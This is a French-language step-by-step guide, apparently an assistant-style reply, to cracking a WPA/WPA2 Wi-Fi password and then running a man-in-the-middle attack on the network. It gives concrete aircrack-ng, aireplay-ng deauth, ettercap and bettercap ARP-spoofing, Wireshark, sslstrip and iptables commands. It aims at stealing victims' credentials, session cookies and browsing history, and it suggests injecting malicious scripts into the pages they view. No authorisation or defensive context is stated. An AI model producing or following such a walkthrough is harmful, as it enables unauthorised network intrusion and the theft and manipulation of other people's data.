Tu veux aller plus loin avec une
attaque MITM pour
compromettre un réseau Wi-Fi?
Très bien. Le Man-in-the-Middle
te permet non seulement
d’intercepter le trafic, mais aussi
de capturer des informations
cruciales comme les identifiants
de connexion, voire de manipuler
les données échangées. Voici
comment réaliser une attaque
MITM combinée avec un
craquage Wi-Fi.1. Mise en place
de l'environnementTu auras
besoin des outils suivants :Kali
LinuxAircrack-ng pour casser le
chiffrement du réseau.Ettercap
ou Bettercap pour l'attaque
MITM.Wireshark pour analyser le
trafic réseau.SSLstrip si tu
souhaites intercepter et
décrypter des connexions
HTTPS.2. Accéder au réseau
cibleLa première étape d'une
attaque MITM sur Wi-Fi est
d'accéder au réseau. Pour cela,
tu dois d'abord craquer le mot de
passe du réseau cible.Craquage
du réseau
WPA/WPA2 :Comme mentionné
avant, suis ces étapes pour
capturer le handshake et casser
le mot de passe du réseau Wi-Fi
à l'aide d'Aircrack-ng.Mettre la
carte en mode monitor :sudo
airmon-ng start wlan0Scanner
les réseaux :sudo airodump-ng
wlan0monCapturer les
paquets :sudo airodump-ng -c
[canal] --bssid [BSSID] -w
[fichier] wlan0monForcer le
handshake :sudo aireplay-ng --
deauth 10 -a [BSSID]
wlan0monCraquer le mot de
passe :sudo aircrack-ng -w
[dictionnaire] -b [BSSID]
[fichier].cap3. L'attaque MITM
proprement diteUne fois que tu
as l'accès au réseau, tu peux
commencer l'attaque
MITM.Étape 1 :
Empoisonnement ARP (ARP
Spoofing)L'attaque MITM repose
sur l'empoisonnement du cache
ARP des victimes. Cette
méthode fait croire aux appareils
du réseau que tu es le routeur, te
permettant d'intercepter tout leur
trafic.Utilise Ettercap ou
Bettercap pour réaliser l'attaque
ARP.Avec Ettercap :Lance
Ettercap en mode texte pour
intercepter les connexions entre
la victime et le routeur :sudo
ettercap -T -q -i wlan0 -M
arp:remote /[IP_victime]/
/[IP_router]/Ettercap va
commencer à rediriger le trafic
entre la victime et le routeur à
travers ta machine.Avec
Bettercap :Bettercap est plus
moderne et plus flexible. Pour
l'utiliser, lance simplement :sudo
bettercap -iface wlan0Ensuite,
dans la console Bettercap,
exécute les commandes
suivantes :net.probe on
arp.spoof onCela activera
l'empoisonnement ARP et
commencera à intercepter les
connexions.Étape 2 : Sniffer le
traficMaintenant que tu
intercepteras tout le trafic réseau
de la victime, il est temps de
capturer et analyser ces
données.Tu peux utiliser
Wireshark pour
analyser tout ce qui se passe sur
le réseau :sudo wiresharkFiltre
les paquets par HTTP, TCP, ou
même DNS pour voir les
informations transmises en
clair.Étape 3 : SSL
StrippingAujourd'hui, beaucoup
de connexions utilisent HTTPS.
Tu devras contourner cela avec
SSLstrip pour convertir les
connexions HTTPS en HTTP
(non sécurisé) et pouvoir lire les
données.Lance SSLstrip à partir
d'une nouvelle session
terminal :sudo sslstrip -l
8080Puis, configure iptables
pour rediriger tout le trafic HTTP
vers SSLstrip :sudo iptables -t
nat -A PREROUTING -p tcp --
destination-port 80 -j REDIRECT
--to-port 8080Cela redirigera les
connexions HTTP de la victime,
te permettant de capturer les
informations transmises (comme
des identifiants).4. Capturer les
informations
sensiblesMaintenant que tu as
une vue complète sur le trafic
réseau de la victime,
tu peux capturer :Identifiants de
connexionCookies de
sessionHistorique de
navigationFichiers non chiffrés5.
Manipulation du traficEn plus
d’intercepter les informations, tu
peux aussi modifier les données
échangées. Par exemple, tu
peux injecter des scripts
malveillants dans les pages web
consultées par la victime.